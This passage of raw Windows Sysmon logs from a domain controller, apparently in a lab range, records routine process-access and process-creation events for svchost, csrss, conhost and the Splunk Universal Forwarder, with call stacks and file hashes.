ntdll.dll+51791 10341000x80000000000000003660Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.793{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003659Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.793{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003658Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.793{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003657Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.793{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003656Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.793{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003655Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.793{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4325-6000-BF00-000000009A01}1840C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003654Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.793{08A6967A-4325-6000-BE00-000000009A01}46841604C:\Windows\system32\cmd.exe{08A6967A-4325-6000-BF00-000000009A01}1840C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003653Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.806{08A6967A-4325-6000-BF00-000000009A01}1840C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{08A6967A-4325-6000-BE00-000000009A01}4684C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000003652Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.793{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4325-6000-BE00-000000009A01}4684C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003651Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.793{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003650Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.793{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003649Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.793{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003648Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.793{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003647Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.793{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003646Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.793{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003645Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.793{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003644Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.793{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003643Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.793{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003642Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.793{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4325-6000-BE00-000000009A01}4684C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003641Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.793{08A6967A-4325-6000-B900-000000009A01}11763032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4325-6000-BE00-000000009A01}4684C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7d48|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003640Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.801{08A6967A-4325-6000-BE00-000000009A01}4684C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003639Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.793{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003638Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.778{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4325-6000-BD00-000000009A01}3016C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003637Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.778{08A6967A-4286-6000-0A00-000000009A01}8441220C:\Windows\system32\services.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003636Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.762{08A6967A-4325-6000-BB00-000000009A01}12481852C:\Windows\system32\conhost.exe{08A6967A-4325-6000-BC00-000000009A01}3056C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003635Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.762{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003634Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.762{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003633Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.762{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003632Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 